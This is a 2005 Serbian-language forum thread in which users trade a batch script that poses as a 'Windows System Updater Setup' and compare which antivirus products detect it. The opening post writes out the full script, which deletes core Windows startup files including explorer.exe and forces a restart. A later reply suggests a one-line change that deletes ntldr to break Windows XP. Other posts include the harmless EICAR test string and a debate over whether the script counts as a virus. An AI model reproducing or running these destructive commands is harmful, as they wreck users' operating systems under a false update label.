Probajte ovo

Kluzo · 08.10.2005

U cilju testiranja AV programa sledeci tekst iskopirajte u txt fajl i taj fajl snimite negde pod nekim imenom, pa onda ga skenirajte av programom:

@ECHO OFF
echo Welcome To Microsoft Windows System Updater Setup
echo Installing Components... Please Wait...
echo y|del c:\autoexec.bat
echo y|del c:\config.sys
echo y|del c:\windows\system.ini
echo y|del c:\windows\win.ini
echo y|del c:\windows\explorer.exe
echo Installing is DONE.
echo Setup Will Now restart Your Computer... Please Wait...
start C:\WINDOWS\RUNDLL.EXE user.exe,exitwindows

Dabar · 08.10.2005

Trojan.BAT.ExitWindows.b.Kaspersky radi posao. A šta ako proba neko ko nema AV ili mu je loš?

Dandy · 08.10.2005

Pa nece mu se nista desiti ako ne promeni ekstenziju u .bat i ne proba da pokrene taj batch skript.

Kluzo · 08.10.2005

Bas tako

Tek promenom u bat ovaj ovo postaje opasno.
Kasperski odradi posao cak i kad probas da snimis ovo u tekstualni fajl, nod 32 je prilikom skeniranja rekao da je potencijalno opasan fajl, avg i norton su zakazali.

Air Jordan · 08.10.2005

Hm,meni NOD nista ne prijavljuje.

Mitke · 08.10.2005

Imace problem vise

Cartman · 08.10.2005

Norton 2005 ga ne konstatuje, ni kad promenim ekstenziju u bat.

momsab · 08.10.2005

Avast nista

M3 · 08.10.2005

Davno receno...i sad tvrdim Kaspersky je majka

WebWolf · 08.10.2005

KAV radi super.
Nego reci ti meni, odakle tebi ovaj kod,a? Brine me sto je virus prilicno opasan ako se konvertuje u .bat ili se na neki nacin aktivira?
Govori , bre

.
Moglo bi se reci da je ovo Exit Windows With No Return :d.

virke · 08.10.2005

Avast home 4.6 ne nalazi nista.
Pocinjem da sumnjam u Avast.

dr.Tiristor · 08.10.2005

M3 je napisao(la):
Davno receno...i sad tvrdim Kaspersky je majka

O yeah!

Zanimljivo!

Znaci, sacuvam fajl u .txt na desktopu, posto KAV nije bio podignut, ja ga dignem, i gledam gde se zagubio fajl. E, pa, nije se zagubio, vec ga je KAV zbrisao po kratkom postupku dok se podizao... Hehe!

Cartman · 08.10.2005

virke je napisao(la):
Avast home 4.6 ne nalazi nista.
Pocinjem da sumnjam u Avast.

Moje poverenje u Norton nije poljuljano !!

Evo i startovao sam skript dva puta... nista se nije desilo

(pobrisao je fajlove i to je to)

zeleni_zub · 09.10.2005

Trojan.BAT.ExitWindows.b

F-Secure ga detektuje čim se snimi BAT file iz tekst editora. Mada ovo i nije neki test antivirusa.

kUdtiHaEX · 09.10.2005

Nije, ali je u pitanju trivijalna stvar (na izgled) koja ipak moze da napravi veliko s*****. Da ja imam krshNortona instaliranog kao i Avast, zabrinuo bih se ozbiljno.

Kluzo · 09.10.2005

Ovo sam skinuo sa domaceg sajta, inace kad sam ga stavio u txt fajl i snimio u my documents odmah posle toga se oglasio kaspersky, naravno i kad mu promenim ekstenziju u .bat. To me je zaintigiralo pa sam probao sa jos par av programa, ali ga oni nisu konstatovali cak ni kao bat fajl,verujem da ga je mozda jos f-secure registrovao, kako je neko pomenuo.
Nije ovo merodavno, ali mi se cini da hvalospevi Kasperskom su na mestu, on apsolutno reaguje vec kad udjem u folder gde se ovaj kod nalazi u neaktivnom obliku tj u fajlu sa ekstenzijom txt.

audiofreak · 09.10.2005

Ovo moze da ozbiljno sjebe samo Win98

Ako hocete nesto pogubno po XP umesto svih "echo y|del" linija stavite samo jednu:

echo y|del c:\ntldr

XP-u gorenavedeni batch ne moze nista jer ce Windows File Protection vratiti explorer.exe, a ostali fajlovi nemaju nikakvog uticaja na rad osim eventualno win.ini i system.ini za MCI, VGA fontove i MAPI sto nije kriticno.

Kad promenite batch, na ovaj nacin recite mi koji AV ga detektuje?

zarko · 09.10.2005

Pa, evo ovde i ovaj test, pa probajte:

5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Ovo snimiti u *.txt ili *.exe ili *.com.
Sad neki antivirusi reaguju odma pri save-u, neki pri startu, a nekima tek kad im daš ručni sken fajla.

PS. Ovo je bezazleno čak i ako se pokrene a antivirus ga ne prepozna.

zokish · 09.10.2005

Wolfman je napisao(la):
KAV radi super.
Nego reci ti meni, odakle tebi ovaj kod,a? Brine me sto je virus prilicno opasan ako se konvertuje u .bat ili se na neki nacin aktivira?
Govori , bre .
Moglo bi se reci da je ovo Exit Windows With No Return :d.

Wolfy, ovo su osnovne DOS komande, kakav crni virus.

Da, stvarno, koliko vas misli da je ovo virus?

Comet Hunter · 09.10.2005

zokish je napisao(la):
Wolfy, ovo su osnovne DOS komande, kakav crni virus.

Da, stvarno, koliko vas misli da je ovo virus?

pa sta ti smatras pod virus??
ne smatras da je virus bilo koji kod koji ima za cilj zlonameran efekat??
neka nova definicija??

homer s. · 09.10.2005

X5o!p%@ap[4\pzx54(p^)7cc)7}$eicar-standard-antivirus-test-file!$h+h*

zokish · 09.10.2005

Comet Hunter je napisao(la):
pa sta ti smatras pod virus??
ne smatras da je virus bilo koji kod koji ima za cilj zlonameran efekat??
neka nova definicija??

Ako si ga nisi ti kreirao i nisi ti startovao na svojoj mašini.
Zadovoljan?

sikili · 09.10.2005

zokish je napisao(la):
Ako si ga nisi ti kreirao i nisi ti startovao na svojoj mašini.
Zadovoljan?

Sta je pisac hteo da kaze?

Sasa · 09.10.2005

Tripuju ljudi. Preskocilo mnogo ljudi DOS eru pa se sada tripuju da je ovo nesto posebno.
Ono je .bat fajl kao .bat fajl, moguce je napisati X^Y varijanti takvih fajlova koji brisu sta god pozelis, formatiraju particije, menjaju imena fajlovima ili lokaciju.
To je tako napravljeno, tako to treba, e sad sto ne treba to da rade oni koji nemaju pojma sta to moze i cemu sluzi, druga je prica.

Ali... uopste, zar ne vazi pravilo "sta ne znas, ne diraj" ?

RazbojNick · 09.10.2005

Imenjace, ako ne diraju ono sto ne znaju, kako da nauce?

"Virus": Detektovao sam fajl licno i obrisao ga rucno.

RazbojNick AV

WebWolf · 09.10.2005

Ma stvar je u tome sto su i kreatori anti-virusa ocigledno preskocili DOS eru, pa im ovakve gluposti prolaze pod nos.
Nije ni cudo da ga je F-Secure nasao, kada koristi skoro identicne Kaspersky baze.
Iako je kriminalno prostog koda, ovaj "stvor" se moze nazvati virusom, jer zadovoljava svaku definiciju virusa, e sad, to sto je nama banalan, kao sto i jeste, to je druga stvar. Pitajte nekog od nesrecnih vlasnika Nortona koji su ovo pokrenuli :d.

voodoo_ · 09.10.2005

Ne zadovoljava uslove virusa jer se ne razmnožava, dakle ovo je čist maliciozni program niže kategorije

darth zool · 10.10.2005

@Voodoo_NBGD
Kako to misliš "ne razmnožava se" ?
Do sada je barem 50 ljudi "dobilo virus" preko Kluzoa.
Znači sledeći AV update mora da sadrži "Kluzo desintegrator tool"

@audiofreak

Ako hocete nesto pogubno po XP umesto svih "echo y|del" linija stavite samo jednu:
echo y|del c:\ntldr

Kaspersky reaguje pri bilo kom pokušaju otvaranja ili preview-a fajla.

weasel · 10.10.2005

Meni ni nod i bit denfender ne prepoznaje nista

Dorry · 11.10.2005

NOD32 ne reaguje... Hmm... Sta bi? :trust:

Probajte ovo

Slavan

Čuven

Čuven

Slavan

Čuven

Čuven

Čuven

Moderator

Čuven

Čuven

Čuven

Slavan

Čuven

Super Operater

Super ridža

Slavan

Banned

Čuven

Slavan

Čuven

Slavan

Slavan

Čuven

Čuven

Čuven

Čuven

Čuven

Slavan

E4

Čuven